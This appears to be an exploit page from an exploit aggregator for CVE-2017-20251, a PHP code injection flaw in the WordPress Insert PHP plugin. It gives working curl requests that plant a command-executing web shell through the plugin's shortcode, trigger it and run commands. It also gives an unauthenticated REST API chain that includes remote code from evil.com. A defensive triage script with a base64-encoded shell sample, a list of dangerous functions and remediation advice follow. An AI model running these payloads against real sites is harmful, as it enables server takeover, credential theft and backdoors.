## https://sploitus.com/exploit?id=8476D214-A11C-54A2-97EC-85289AF07ED0
# CVE-2017-20251: Insert PHP Plugin PHP Code Injection
## Vulnerability Title
Unauthenticated PHP Code Injection via Shortcode Processing in Insert PHP Plugin
## Basic Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2017-20251 |
| **Plugin** | Insert PHP (now Woody Code Snippets) |
| **Affected Versions** | < 3.3.1 |
| **Authentication** | Any account able to create or edit posts (the REST API enforces the same capability checks as the editor); unauthenticated only when chained with the WordPress 4.7.0/4.7.1 REST API content-injection flaw (Exploit-DB 41308, fixed in 4.7.2) |
## Impact
**Severity: Critical**
Full Remote Code Execution (RCE) on the web server:
- Execute arbitrary PHP code on the server
- Read/write any file accessible to the web server user
- Access database credentials from wp-config.php
- Install web shells or backdoors
- Pivot to other systems
- Complete compromise of confidentiality, integrity, and availability
## PoC - Curl Commands
### Step 1: Create a Post with Malicious Shortcode (Authenticated)
```bash
# Any account that can create posts works here (Author role or above). Application
# passwords exist from WordPress 5.6; on older sites substitute cookie + nonce auth.
curl -s -k -X POST "https://yorbit7.ddev.site/wp-json/wp/v2/posts" \
  -H "Content-Type: application/json" \
  -u "USERNAME:APPLICATION_PASSWORD" \
  -d @- <<'EOF'
{
  "title": "Malicious Post",
  "content": "[insert_php]file_put_contents('/var/www/html/shell.php', '<?php system($_GET[\"cmd\"]); ?>');[/insert_php]",
  "status": "publish"
}
EOF
# The "id" field of the JSON response is the POST_ID used in the next steps.
# If the account lacks the unfiltered_html capability, wp_kses strips the raw
# <?php ... ?> tag from the stored content; the marker-file variant below avoids that.
```
### Step 2: Visit the Post to Trigger Code Execution
```bash
curl -s -k "https://yorbit7.ddev.site/?p=POST_ID"
```
### Step 3: Verify Code Execution
```bash
curl -s -k "https://yorbit7.ddev.site/shell.php?cmd=id"
```
### Alternative: Direct eval() Test (Simple Proof)
```bash
# Create post
curl -s -k -X POST "https://yorbit7.ddev.site/wp-json/wp/v2/posts" \
-H "Content-Type: application/json" \
-u "USERNAME:APPLICATION_PASSWORD" \
-d '{"title":"RCE Test","content":"[insert_php]file_put_contents(\"/var/www/html/rce_poc.txt\",\"RCE-SUCCESS\");[/insert_php]","status":"publish"}'
# Trigger
curl -s -k "https://yorbit7.ddev.site/?p=POST_ID"
# Verify (run on the web server; the marker is written to the document root)
cat /var/www/html/rce_poc.txt   # Should output: RCE-SUCCESS
```
### Exploit-DB Reference (Unauthenticated, WordPress 4.7.0 and 4.7.1)
Exploit-DB 41308 chains this plugin with the WordPress 4.7.0/4.7.1 REST API content-injection flaw (fixed in 4.7.2). Sending a non-numeric `id` such as `1234ffff` for an existing post made the permission check look up a post that does not exist, so the check was skipped, while the update itself cast the id to `1234` and overwrote that post's content without any credentials:
```bash
# No -u: the request is unauthenticated. Post 1234 must exist; the alphanumeric id is the bypass.
curl -s -k -X POST "https://target.com/wp-json/wp/v2/posts/1234" \
  -H "Content-Type: application/json" \
  -d '{
    "id": "1234ffff",
    "title": "by Hacker",
    "content": "[insert_php]include(\"http://evil.com/file.php\");[/insert_php]"
  }'
# include() of a URL needs allow_url_include=On in php.ini; where it is off,
# use a file_put_contents() payload as in the authenticated steps above.
```
## Response Example
When the vulnerable shortcode is processed, the PHP code inside is executed by eval(). For the marker file test:
```
Request: Create post with [insert_php]file_put_contents("marker.txt","SUCCESS");[/insert_php]
Response: Post created successfully
Request: GET /?p=POST_ID
Response: Page renders, PHP code executes, marker.txt created on server
Verification:
$ cat /var/www/html/marker.txt
SUCCESS
```
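To find posts that already carry this payload on a site (for example from a `GET /wp-json/wp/v2/posts?context=edit` export, which returns `content.raw`, or from `post_content` dumped out of the database), the following triage script is an added example, not part of the original page or of the plugin. It extracts every `[insert_php]` / `[wbcr_php_snippet]` shortcode body, flags dangerous function calls, remote URLs and web-shell markers, and also decodes quoted base64 literals so a dropper hidden behind `base64_decode()` is inspected. The four sample posts are constructed; the base64 literal in the last one encodes the `<?php system($_GET["cmd"]); ?>` shell used in the PoC, which is how an attacker without `unfiltered_html` gets past `wp_kses`.

```python
import base64
import binascii
import json
import re

# Constructed sample (not from a real site): four posts shaped like a
# GET /wp-json/wp/v2/posts?context=edit response, which exposes content.raw.
SAMPLE_POSTS_JSON = json.dumps([
    {"id": 101, "title": {"rendered": "Welcome"},
     "content": {"raw": "<p>Hello world</p>"}},
    {"id": 102, "title": {"rendered": "Pricing table"},
     "content": {"raw": "[insert_php]echo get_option('price_table');[/insert_php]"}},
    {"id": 103, "title": {"rendered": "by Hacker"},
     "content": {"raw": "[insert_php]include(\"http://evil.com/file.php\");[/insert_php]"}},
    # base64 of: <?php system($_GET["cmd"]); ?>  (a raw <?php tag would be stripped by wp_kses)
    {"id": 104, "title": {"rendered": "Malicious Post"},
     "content": {"raw": "[insert_php]file_put_contents('/var/www/html/shell.php', "
                        "base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+'));[/insert_php]"}},
])

# Both shortcode names the plugin has used: [insert_php] originally, [wbcr_php_snippet] after the rename.
SHORTCODE_RE = re.compile(
    r"\[(insert_php|wbcr_php_snippet)(?:\s[^\]]*)?\](.*?)\[/\1\]",
    re.DOTALL | re.IGNORECASE,
)
CALL_RE = re.compile(r"\b([A-Za-z_][A-Za-z0-9_]*)\s*\(")
INCLUDE_RE = re.compile(r"\b((?:include|require)(?:_once)?)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")

# Functions that never belong in page content: droppers, command execution,
# remote loading and the usual obfuscation layers.
DANGEROUS_CALLS = {
    "eval", "assert", "create_function",
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "file_put_contents", "fwrite", "fopen", "file_get_contents", "curl_exec",
    "include", "include_once", "require", "require_once",
    "base64_decode", "gzinflate", "gzuncompress", "str_rot13",
}
WEBSHELL_MARKERS = ("<?php", "$_get", "$_post", "$_request", "$_cookie")


def extract_snippets(content):
    """Return the PHP body of every insert_php-style shortcode in one post's content."""
    return [m.group(2).strip() for m in SHORTCODE_RE.finditer(content)]


def decoded_base64_literals(code):
    """Decode quoted base64 literals so a payload hidden behind base64_decode() is inspected too."""
    decoded = []
    for literal in B64_LITERAL_RE.findall(code):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # looked like base64 but was not (a hash, a token)
    return decoded


def assess_snippet(code):
    """Return a sorted list of indicators for one snippet body; an empty list means nothing was flagged."""
    indicators = set()
    for text in [code] + decoded_base64_literals(code):
        lowered = text.lower()
        for name in CALL_RE.findall(text) + INCLUDE_RE.findall(text):
            if name.lower() in DANGEROUS_CALLS:
                indicators.add(name.lower())
        if URL_RE.search(text):
            indicators.add("remote_url")
        if any(marker in lowered for marker in WEBSHELL_MARKERS):
            indicators.add("webshell_marker")
    return sorted(indicators)


def triage_posts(posts_json):
    """Map post id -> title, shortcode bodies and indicators for every post carrying a PHP shortcode."""
    findings = {}
    for post in json.loads(posts_json):
        content = post["content"].get("raw") or post["content"].get("rendered", "")
        snippets = extract_snippets(content)
        if not snippets:
            continue
        findings[post["id"]] = {
            "title": post["title"]["rendered"],
            "snippets": snippets,
            "indicators": sorted({i for s in snippets for i in assess_snippet(s)}),
        }
    return findings


if __name__ == "__main__":
    for post_id, finding in triage_posts(SAMPLE_POSTS_JSON).items():
        verdict = "SUSPICIOUS" if finding["indicators"] else "review"
        print(f"post {post_id} [{verdict}] {finding['title']!r}: {finding['indicators']}")
```

Every post that carries a PHP shortcode is reported, including ones with no indicators (post 102 above), because with this plugin installed any shortcode body is executable and deserves a human look; the indicator list is there to rank the queue, not to clear a post.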
## Recommended Remediation
1. **Immediate**: Uninstall the Insert PHP plugin or upgrade to version 3.3.1 or later
2. **Alternative Plugin**: Use a modern code snippet plugin such as WPCode that does not execute PHP found in post content and restricts snippet creation to administrators
3. **If Must Use PHP Snippets**: Restrict post creation and editing to trusted administrators; with this plugin active, every account that can publish a post can run PHP, and the REST API exposes the same capability to any API client holding that account's credentials
4. **Hardening**: Set the `DISALLOW_UNFILTERED_HTML` constant so `wp_kses` strips raw `<?php ... ?>` tags from post content; this does not stop the attack, because the shortcode body is plain text and calls such as `file_put_contents()` or `base64_decode()` still run
### Patch Analysis
The patched version (3.3.1+):
- Renamed shortcode from `[insert_php]` to `[wbcr_php_snippet]`
- Removed direct `eval()` usage in favor of a safe execution context
- Added authentication checks on REST API endpoints
- Implemented snippet ID validation before execution
## References
- [Exploit-DB 41308](https://www.exploit-db.com/exploits/41308)
- [NVD CVE-2017-20251](https://nvd.nist.gov/vuln/detail/CVE-2017-20251)
- [WordPress Plugin Page](https://wordpress.org/plugins/insert-php/)
- [CWE-94: Code Injection](https://cwe.mitre.org/data/definitions/94.html)